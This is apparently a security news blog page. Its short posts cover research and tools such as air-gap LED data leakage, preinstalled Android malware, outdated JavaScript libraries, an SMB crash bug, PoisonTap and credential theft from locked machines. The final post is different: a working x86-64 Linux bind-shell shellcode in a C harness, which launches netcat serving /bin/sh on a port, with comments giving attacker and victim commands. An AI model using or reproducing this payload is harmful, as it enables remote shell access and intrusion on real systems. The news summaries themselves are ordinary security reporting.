Mrz 17 23

In this new paper title „LED-it-GO: Leaking (a lot of) Data from Air-Gapped Computers via the (small) Hard Drive LED“ researchers at Ben-Gurion University Cyber Security Research Center present a method how data can be stolen with a maximum bit rate of 4000 bits per second from an isolated „air-gapped“ computer’s hard drive reading the pulses of light on the LED drive using various types of cameras and light sensors.

Find out more:
* Cameras can Steal Data from Computer Hard Drive LED Lights
* PDF version of the paper
* LED-it-GO – youtube video

written by d45id \\ tags: , , , , , ,

Mrz 17 15

android malwareResearchers from Check Point Mobile Researcher Team detected several infections in 36 Android devices from different manufacturer. Security breaches in Andorid devices are noting new today but the attack is intressting because the malware were already present on the devices even before the users received them. The malicious apps were not part of the official ROM supplied by the vendor, and were added somewhere along the supply chain….

Find out more in Preinstalled Malware Tareting Mobile Users

written by d45id \\ tags: , , , ,

Mrz 17 13

alertScientists from the Northeastern University in Boston get the most popular out of 100,000 JavaScript libraries, according to their view, and tested on 133,000 websites in which versions the libraries are used.

As a result of their study, they describe that 37 percent of the scanned domains use at least one vulnerable version. At 10 percent, two or more vulnerable JavaScript libraries are in use. In addition, many of the websites analyzed load libraries such as SWFObject and YUI, which no longer receive support.

In their selection, the scientists have chosen widespread libraries such as Bootstrap and jQuery. 75,000 of the websites examined can be found in the Alexa ranking – the rest are randomly selected pages with .com domain.

Paper:
Thou Shalt Not Depend on Me: Analysing the Use of Outdated JavaScript Libraries on the Web

written by d45id \\ tags: , , , , , , , ,

Feb 17 03

passwdMicrosoft Windows contains a memory corruption bug in the handling of SMB traffic. In particular, Windows fails to properly handle a specially-crafted server response that contains too many bytes following the structure defined in the SMB2 TREE_CONNECT Response structure. By connecting to a malicious SMB server, a vulnerable Windows client system may crash (BSOD) in mrxsmb20.sys.

written by d45id

Nov 16 17

poisontapSamy Kamkar released an amazing new tool suite for Raspberry Pi Zero which can siphons cookies, exposes the internal router and installs a persitend web-based backdoor on your locked computers.

Project site: https://samy.pl/poisontap/
Source code: https://github.com/samyk/poisontap

written by d45id \\ tags: , , , , , ,

Sep 16 08

passwdSecurity researcher Robert Fuller discovered an attack method with which Windows and Mac user credentials can be stolen from a locked machine.
This attack is affected against actual Windows and Mac OS computers on which the user has already logged in.

The researcher used USB-based Ethernet dongles like USB Armory or Hak5 Turtle , for which he modified the firmware code to run special software that sets the plug-and-play USB device as the network gateway, DNS, and WPAD servers on the computer it’s connected to.
Find out more:

written by d45id \\ tags: , , , , , ,

Jul 16 06

Floser Bacurio and Roland Dela Paz published an interesting article about Locky’s new anti-sandbox technique and how to crack it.

Find out more: Cracking Locky’s New Anti-Sandbox Technique

written by d45id \\ tags: , , ,

Jul 16 06
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include <stdio.h>
#include <string.h>
 
// Victim: netstat -an | grep LISTEN | grep tcp
// Attacker: nc <victim_IP> <port>
 
unsigned char code[] = \
 
#define PORT "\x39\x39"
// Keep to two bytes
 
"\x48\x31\xff\x48\xf7\xe7\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x6e\x63\x57\x48\x89\xe7\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe3\x68\x2d\x6c\x76\x65\x48\x89\xe1\x68\x2d\x70"PORT"\x48\x89\xe6\x50\x53\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
;
 
int main ()
{
    // I make sure there are no nulls
    // The string count will terminate at the first \x00
    printf("The Shellcode is %d Bytes Long\n", strlen(code));
 
    // Next I throw 0xAAAAAAAA into every register before shellcode execution
    // This ensures that the shellcode will run in any circumstance
 
	__asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
		"mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t" 
		"mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t" 
		"mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t" 
		"mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
		"call code");
	return 0;
}

written by d45id \\ tags: , , , ,